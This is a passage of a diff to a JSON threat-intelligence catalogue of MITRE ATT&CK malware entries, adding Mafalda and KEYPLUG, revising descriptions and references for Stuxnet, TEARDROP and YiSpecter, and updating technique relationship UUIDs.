+ "description": "[Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)",
+ "meta": {
+ "external_id": "S1060",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://assets.sentinelone.com/sentinellabs22/metador#page=1",
+ "https://attack.mitre.org/software/S1060"
+ ],
+ "synonyms": [
+ "Mafalda"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "3be1fb7a-0f7e-415e-8e3a-74a80d596e68",
+ "value": "Mafalda - S1060"
+ },
{
"description": "[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)",
"meta": {
@@ -12092,13 +12858,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "b8eb28e4-48a6-40ae-951a-328714f75eda",
@@ -12596,7 +13355,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0180",
- "https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2",
+ "https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2",
"https://www.us-cert.gov/ncas/alerts/TA17-318B",
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF"
],
@@ -12605,6 +13364,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "0a52e73b-d7e9-45ae-9bda-46568f753931",
"tags": [
@@ -12724,13 +13490,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -12751,13 +13510,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08",
@@ -13054,13 +13806,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "4c59cce8-cb48-4141-b9f1-f646edfaadb0",
@@ -13116,13 +13861,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "5bcd5511-6756-4824-a692-e8bb109364af",
@@ -13222,7 +13960,7 @@
"refs": [
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
"https://attack.mitre.org/software/S0023",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www.justice.gov/file/1080281/download",
"https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
"https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf"
@@ -13244,6 +13982,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"tags": [
@@ -13445,11 +14190,11 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0203",
"https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ",
"https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
"https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
"https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
@@ -14825,13 +15570,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2",
@@ -15579,13 +16317,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "47afe41c-4c08-485e-b062-c3bd209a1cce",
@@ -15817,13 +16548,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"tags": [
@@ -15853,14 +16577,14 @@
"type": "uses"
},
{
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16520,13 +17244,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2",
@@ -17536,7 +18253,7 @@
"value": "Nebulae - S0630"
},
{
- "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)",
+ "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ",
"meta": {
"external_id": "S0603",
"mitre_platforms": [
@@ -17547,7 +18264,7 @@
"https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01",
"https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf",
"https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf",
- "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf"
+ "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf"
],
"synonyms": [
"Stuxnet",
@@ -18322,13 +19039,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "68dca94f-c11d-421e-9287-7c501108e18c",
@@ -18468,13 +19178,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
@@ -18572,14 +19275,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -18855,7 +19558,7 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -20986,13 +21689,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -21007,6 +21703,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -21248,7 +21951,7 @@
"value": "RARSTONE - S0055"
},
{
- "description": "[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)",
+ "description": "[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)",
"meta": {
"external_id": "S0560",
"mitre_platforms": [
@@ -21529,6 +22232,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -21599,6 +22309,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -21613,6 +22330,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
"tags": [
@@ -21697,13 +22421,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"tags": [
@@ -21795,6 +22512,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"tags": [
@@ -21900,6 +22624,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d4dc46e3-5ba5-45b9-8204-010867cacfcb",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -21942,6 +22680,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -21949,6 +22694,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -23681,43 +24433,7 @@
"TRISIS"
]
},
- "related": [
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- }
- ],
+ "related": [],
"uuid": "93ae2edf-a598-4d2d-acd7-bcae0c021923",
"value": "TRITON - S0609"
},
@@ -23848,13 +24564,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
"tags": [
@@ -23883,13 +24592,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -24508,6 +25210,9 @@
"refs": [
"https://attack.mitre.org/software/S1012",
"https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage"
+ ],
+ "synonyms": [
+ "PowerLess"
]
},
"related": [
@@ -25052,15 +25757,107 @@
"value": "Prikormka - S0113"
},
{
- "description": "[YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter)",
+ "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)",
"meta": {
"external_id": "S0311",
+ "mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
"refs": [
"https://attack.mitre.org/software/S0311",
- "https://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/"
+ "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/"
+ ],
+ "synonyms": [
+ "YiSpecter"
]
},
- "related": [],
+ "related": [
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "670a4d75-103b-4b14-8a9e-4652fa795edd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d3bc5020-f6a2-41c0-8ccb-5e563101b60c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fcb11f06-ce0e-490b-bcc1-04a1623579f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
"uuid": "a15c9357-2be0-4836-beec-594f28b9b4a9",
"value": "YiSpecter - S0311"
},
@@ -25824,13 +26621,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "326af1cd-78e7-45b7-a326-125d2f7ef8f2",
@@ -25852,6 +26642,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"tags": [
@@ -25912,6 +26709,84 @@
"uuid": "47124daf-44be-4530-9c63-038bc64318dd",
"value": "RegDuke - S0511"
},
+ {
+ "description": "[KEYPLUG](https://attack.mitre.org/software/S1051) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least June 2021.(Citation: Mandiant APT41)",
+ "meta": {
+ "external_id": "S1051",
+ "mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1051",
+ "https://www.mandiant.com/resources/apt41-us-state-governments"
+ ],
+ "synonyms": [
+ "KEYPLUG",
+ "KEYPLUG.LINUX"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
